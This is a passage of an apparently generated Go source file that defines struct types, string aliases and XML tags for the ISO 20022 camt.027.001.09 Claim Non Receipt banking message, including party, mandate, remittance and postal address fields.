Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ClaimNonReceiptV09 struct {
Assgnmt CaseAssignment5 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Assgnmt"`
Case Case5 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Case,omitempty"`
Undrlyg UnderlyingTransaction7Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Undrlyg"`
CoverDtls MissingCover5 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CoverDtls,omitempty"`
InstrForAssgne InstructionForAssignee1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstrForAssgne,omitempty"`
SplmtryData []SupplementaryData1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SplmtryData,omitempty"`
}
// May be one of RTGS, RTNS, MPNS, BOOK
type ClearingChannel2Code string
type ClearingSystemIdentification2Choice struct {
Cd ExternalClearingSystemIdentification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ClearingSystemIdentification3Choice struct {
Cd ExternalCashClearingSystem1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ClearingSystemMemberIdentification2 struct {
ClrSysId ClearingSystemIdentification2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ClrSysId,omitempty"`
MmbId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MmbId"`
}
type Contact4 struct {
NmPrfx NamePrefix2Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 NmPrfx,omitempty"`
Nm Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
PhneNb PhoneNumber `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PhneNb,omitempty"`
MobNb PhoneNumber `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MobNb,omitempty"`
FaxNb PhoneNumber `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FaxNb,omitempty"`
EmailAdr Max2048Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 EmailAdr,omitempty"`
EmailPurp Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 EmailPurp,omitempty"`
JobTitl Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 JobTitl,omitempty"`
Rspnsblty Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rspnsblty,omitempty"`
Dept Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dept,omitempty"`
Othr []OtherContact1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Othr,omitempty"`
PrefrdMtd PreferredContactMethod1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PrefrdMtd,omitempty"`
}
// Must match the pattern [A-Z]{2,2}
type CountryCode string
// May be one of CRDT, DBIT
type CreditDebitCode string
type CreditTransferMandateData1 struct {
MndtId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MndtId,omitempty"`
Tp MandateTypeInformation2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
DtOfSgntr ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DtOfSgntr,omitempty"`
DtOfVrfctn ISODateTime `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DtOfVrfctn,omitempty"`
ElctrncSgntr Max10KBinary `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ElctrncSgntr,omitempty"`
FrstPmtDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FrstPmtDt,omitempty"`
FnlPmtDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FnlPmtDt,omitempty"`
Frqcy Frequency36Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Frqcy,omitempty"`
Rsn MandateSetupReason1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rsn,omitempty"`
}
type CreditorReferenceInformation2 struct {
Tp CreditorReferenceType2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Ref Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Ref,omitempty"`
}
type CreditorReferenceType1Choice struct {
Cd DocumentType3Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type CreditorReferenceType2 struct {
CdOrPrtry CreditorReferenceType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdOrPrtry"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type DateAndDateTime2Choice struct {
Dt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dt,omitempty"`
DtTm ISODateTime `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DtTm,omitempty"`
}
type DateAndPlaceOfBirth1 struct {
BirthDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 BirthDt"`
PrvcOfBirth Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PrvcOfBirth,omitempty"`
CityOfBirth Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CityOfBirth"`
CtryOfBirth CountryCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtryOfBirth"`
}
type DatePeriod2 struct {
FrDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FrDt"`
ToDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ToDt"`
}
type DiscountAmountAndType1 struct {
Tp DiscountAmountType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Amt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt"`
}
type DiscountAmountType1Choice struct {
Cd ExternalDiscountAmountType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
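// Document is the root element of a camt.027.001.09 message; it wraps
// the single ClaimNonReceiptV09 payload under the ClmNonRct tag.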
type Document struct {
ClmNonRct ClaimNonReceiptV09 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ClmNonRct"`
}
type DocumentAdjustment1 struct {
Amt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt"`
CdtDbtInd CreditDebitCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtDbtInd,omitempty"`
Rsn Max4Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rsn,omitempty"`
AddtlInf Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AddtlInf,omitempty"`
}
type DocumentLineIdentification1 struct {
Tp DocumentLineType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Nb Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nb,omitempty"`
RltdDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RltdDt,omitempty"`
}
type DocumentLineInformation1 struct {
Id []DocumentLineIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
Desc Max2048Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Desc,omitempty"`
Amt RemittanceAmount3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt,omitempty"`
}
type DocumentLineType1 struct {
CdOrPrtry DocumentLineType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdOrPrtry"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type DocumentLineType1Choice struct {
Cd ExternalDocumentLineType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
// May be one of RADM, RPIN, FXDR, DISP, PUOR, SCOR
type DocumentType3Code string
// May be one of MSIN, CNFA, DNFA, CINV, CREN, DEBN, HIRI, SBIN, CMCN, SOAC, DISP, BOLD, VCHR, AROI, TSUT, PUOR
type DocumentType6Code string
type EquivalentAmount2 struct {
Amt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt"`
CcyOfTrf ActiveOrHistoricCurrencyCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CcyOfTrf"`
}
// Must match the pattern [0-9]{2}
type Exact2NumericText string
// Must match the pattern [a-zA-Z0-9]{4}
type Exact4AlphaNumericText string
// May be no more than 4 items long
type ExternalAccountIdentification1Code string
// May be no more than 4 items long
type ExternalAgentInstruction1Code string
// May be no more than 4 items long
type ExternalCashAccountType1Code string
// May be no more than 3 items long
type ExternalCashClearingSystem1Code string
// May be no more than 4 items long
type ExternalCategoryPurpose1Code string
// May be no more than 5 items long
type ExternalClearingSystemIdentification1Code string
// May be no more than 4 items long
type ExternalDiscountAmountType1Code string
// May be no more than 4 items long
type ExternalDocumentLineType1Code string
// May be no more than 4 items long
type ExternalFinancialInstitutionIdentification1Code string
// May be no more than 4 items long
type ExternalGarnishmentType1Code string
// May be no more than 35 items long
type ExternalLocalInstrument1Code string
// May be no more than 4 items long
type ExternalMandateSetupReason1Code string
// May be no more than 4 items long
type ExternalOrganisationIdentification1Code string
// May be no more than 4 items long
type ExternalPersonIdentification1Code string
// May be no more than 4 items long
type ExternalProxyAccountType1Code string
// May be no more than 4 items long
type ExternalPurpose1Code string
// May be no more than 4 items long
type ExternalServiceLevel1Code string
// May be no more than 4 items long
type ExternalTaxAmountType1Code string
type FinancialIdentificationSchemeName1Choice struct {
Cd ExternalFinancialInstitutionIdentification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type FinancialInstitutionIdentification18 struct {
BICFI BICFIDec2014Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 BICFI,omitempty"`
ClrSysMmbId ClearingSystemMemberIdentification2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ClrSysMmbId,omitempty"`
LEI LEIIdentifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LEI,omitempty"`
Nm Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
PstlAdr PostalAddress24 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PstlAdr,omitempty"`
Othr GenericFinancialIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Othr,omitempty"`
}
type Frequency36Choice struct {
Tp Frequency6Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Prd FrequencyPeriod1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prd,omitempty"`
PtInTm FrequencyAndMoment1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PtInTm,omitempty"`
}
// May be one of YEAR, MNTH, QURT, MIAN, WEEK, DAIL, ADHO, INDA, FRTN
type Frequency6Code string
type FrequencyAndMoment1 struct {
Tp Frequency6Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp"`
PtInTm Exact2NumericText `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PtInTm"`
}
type FrequencyPeriod1 struct {
Tp Frequency6Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp"`
CntPerPrd float64 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CntPerPrd"`
}
type Garnishment3 struct {
Tp GarnishmentType1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp"`
Grnshee PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Grnshee,omitempty"`
GrnshmtAdmstr PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 GrnshmtAdmstr,omitempty"`
RefNb Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RefNb,omitempty"`
Dt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dt,omitempty"`
RmtdAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RmtdAmt,omitempty"`
FmlyMdclInsrncInd bool `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FmlyMdclInsrncInd,omitempty"`
MplyeeTermntnInd bool `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MplyeeTermntnInd,omitempty"`
}
type GarnishmentType1 struct {
CdOrPrtry GarnishmentType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdOrPrtry"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type GarnishmentType1Choice struct {
Cd ExternalGarnishmentType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type GenericAccountIdentification1 struct {
Id Max34Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
SchmeNm AccountSchemeName1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SchmeNm,omitempty"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type GenericFinancialIdentification1 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
SchmeNm FinancialIdentificationSchemeName1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SchmeNm,omitempty"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type GenericIdentification30 struct {
Id Exact4AlphaNumericText `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr"`
SchmeNm Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SchmeNm,omitempty"`
}
type GenericOrganisationIdentification1 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
SchmeNm OrganisationIdentificationSchemeName1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SchmeNm,omitempty"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
type GenericPersonIdentification1 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
SchmeNm PersonIdentificationSchemeName1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SchmeNm,omitempty"`
Issr Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Issr,omitempty"`
}
// Must match the pattern [A-Z]{2,2}[0-9]{2,2}[a-zA-Z0-9]{1,30}
type IBAN2007Identifier string
type ISODate time.Time
func (t *ISODate) UnmarshalText(text []byte) error {
return (*xsdDate)(t).UnmarshalText(text)
}
func (t ISODate) MarshalText() ([]byte, error) {
return xsdDate(t).MarshalText()
}
type ISODateTime time.Time
func (t *ISODateTime) UnmarshalText(text []byte) error {
return (*xsdDateTime)(t).UnmarshalText(text)
}
func (t ISODateTime) MarshalText() ([]byte, error) {
return xsdDateTime(t).MarshalText()
}
type ISOYear time.Time
func (t *ISOYear) UnmarshalText(text []byte) error {
return (*xsdGYear)(t).UnmarshalText(text)
}
func (t ISOYear) MarshalText() ([]byte, error) {
return xsdGYear(t).MarshalText()
}
type InstructionForAssignee1 struct {
Cd ExternalAgentInstruction1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
InstrInf Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstrInf,omitempty"`
}
// Must match the pattern [A-Z0-9]{18,18}[0-9]{2,2}
type LEIIdentifier string
type LocalInstrument2Choice struct {
Cd ExternalLocalInstrument1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type MandateClassification1Choice struct {
Cd MandateClassification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
// May be one of FIXE, USGB, VARI
type MandateClassification1Code string
type MandateRelatedData2Choice struct {
DrctDbtMndt MandateRelatedInformation15 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DrctDbtMndt,omitempty"`
CdtTrfMndt CreditTransferMandateData1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtTrfMndt,omitempty"`
}
type MandateRelatedInformation15 struct {
MndtId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MndtId,omitempty"`
DtOfSgntr ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DtOfSgntr,omitempty"`
AmdmntInd bool `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AmdmntInd,omitempty"`
AmdmntInfDtls AmendmentInformationDetails14 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AmdmntInfDtls,omitempty"`
ElctrncSgntr Max1025Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ElctrncSgntr,omitempty"`
FrstColltnDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FrstColltnDt,omitempty"`
FnlColltnDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FnlColltnDt,omitempty"`
Frqcy Frequency36Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Frqcy,omitempty"`
Rsn MandateSetupReason1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rsn,omitempty"`
TrckgDays Exact2NumericText `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TrckgDays,omitempty"`
}
type MandateSetupReason1Choice struct {
Cd ExternalMandateSetupReason1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type MandateTypeInformation2 struct {
SvcLvl ServiceLevel8Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SvcLvl,omitempty"`
LclInstrm LocalInstrument2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LclInstrm,omitempty"`
CtgyPurp CategoryPurpose1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtgyPurp,omitempty"`
Clssfctn MandateClassification1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Clssfctn,omitempty"`
}
// May be no more than 1025 items long
type Max1025Text string
type Max10KBinary []byte
func (t *Max10KBinary) UnmarshalText(text []byte) error {
return (*xsdBase64Binary)(t).UnmarshalText(text)
}
func (t Max10KBinary) MarshalText() ([]byte, error) {
return xsdBase64Binary(t).MarshalText()
}
// May be no more than 128 items long
type Max128Text string
// May be no more than 140 items long
type Max140Text string
// May be no more than 16 items long
type Max16Text string
// May be no more than 2048 items long
type Max2048Text string
// May be no more than 34 items long
type Max34Text string
// May be no more than 350 items long
type Max350Text string
// May be no more than 35 items long
type Max35Text string
// May be no more than 4 items long
type Max4Text string
// May be no more than 70 items long
type Max70Text string
type MissingCover5 struct {
MssngCoverInd bool `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MssngCoverInd"`
CoverCrrctn SettlementInstruction13 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CoverCrrctn,omitempty"`
}
// May be one of DOCT, MADM, MISS, MIST, MIKS
type NamePrefix2Code string
type OrganisationIdentification29 struct {
AnyBIC AnyBICDec2014Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AnyBIC,omitempty"`
LEI LEIIdentifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LEI,omitempty"`
Othr []GenericOrganisationIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Othr,omitempty"`
}
type OrganisationIdentificationSchemeName1Choice struct {
Cd ExternalOrganisationIdentification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type OriginalGroupInformation29 struct {
OrgnlMsgId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMsgId"`
OrgnlMsgNmId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMsgNmId"`
OrgnlCreDtTm ISODateTime `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlCreDtTm,omitempty"`
}
type OriginalTransactionReference35 struct {
IntrBkSttlmAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 IntrBkSttlmAmt,omitempty"`
Amt AmountType4Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt,omitempty"`
IntrBkSttlmDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 IntrBkSttlmDt,omitempty"`
ReqdColltnDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ReqdColltnDt,omitempty"`
ReqdExctnDt DateAndDateTime2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ReqdExctnDt,omitempty"`
CdtrSchmeId PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtrSchmeId,omitempty"`
SttlmInf SettlementInstruction11 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SttlmInf,omitempty"`
PmtTpInf PaymentTypeInformation27 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PmtTpInf,omitempty"`
PmtMtd PaymentMethod4Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PmtMtd,omitempty"`
MndtRltdInf MandateRelatedData2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MndtRltdInf,omitempty"`
RmtInf RemittanceInformation21 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RmtInf,omitempty"`
UltmtDbtr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 UltmtDbtr,omitempty"`
Dbtr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dbtr,omitempty"`
DbtrAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DbtrAcct,omitempty"`
DbtrAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DbtrAgt,omitempty"`
DbtrAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DbtrAgtAcct,omitempty"`
CdtrAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtrAgt,omitempty"`
CdtrAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtrAgtAcct,omitempty"`
Cdtr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cdtr,omitempty"`
CdtrAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtrAcct,omitempty"`
UltmtCdtr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 UltmtCdtr,omitempty"`
Purp Purpose2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Purp,omitempty"`
}
type OtherContact1 struct {
ChanlTp Max4Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ChanlTp"`
Id Max128Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id,omitempty"`
}
type Party38Choice struct {
OrgId OrganisationIdentification29 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgId,omitempty"`
PrvtId PersonIdentification13 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PrvtId,omitempty"`
}
type Party40Choice struct {
Pty PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Pty,omitempty"`
Agt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Agt,omitempty"`
}
type PartyIdentification135 struct {
Nm Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
PstlAdr PostalAddress24 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PstlAdr,omitempty"`
Id Party38Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id,omitempty"`
CtryOfRes CountryCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtryOfRes,omitempty"`
CtctDtls Contact4 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtctDtls,omitempty"`
}
// May be one of CHK, TRF, DD, TRA
type PaymentMethod4Code string
type PaymentTypeInformation27 struct {
InstrPrty Priority2Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstrPrty,omitempty"`
ClrChanl ClearingChannel2Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ClrChanl,omitempty"`
SvcLvl []ServiceLevel8Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SvcLvl,omitempty"`
LclInstrm LocalInstrument2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LclInstrm,omitempty"`
SeqTp SequenceType3Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SeqTp,omitempty"`
CtgyPurp CategoryPurpose1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtgyPurp,omitempty"`
}
type PersonIdentification13 struct {
DtAndPlcOfBirth DateAndPlaceOfBirth1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DtAndPlcOfBirth,omitempty"`
Othr []GenericPersonIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Othr,omitempty"`
}
type PersonIdentificationSchemeName1Choice struct {
Cd ExternalPersonIdentification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
// Must match the pattern \+[0-9]{1,3}-[0-9()+\-]{1,30}
type PhoneNumber string
type PostalAddress24 struct {
AdrTp AddressType3Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AdrTp,omitempty"`
Dept Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dept,omitempty"`
SubDept Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SubDept,omitempty"`
StrtNm Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 StrtNm,omitempty"`
BldgNb Max16Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 BldgNb,omitempty"`
BldgNm Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 BldgNm,omitempty"`
Flr Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Flr,omitempty"`
PstBx Max16Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PstBx,omitempty"`
Room Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Room,omitempty"`
PstCd Max16Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PstCd,omitempty"`
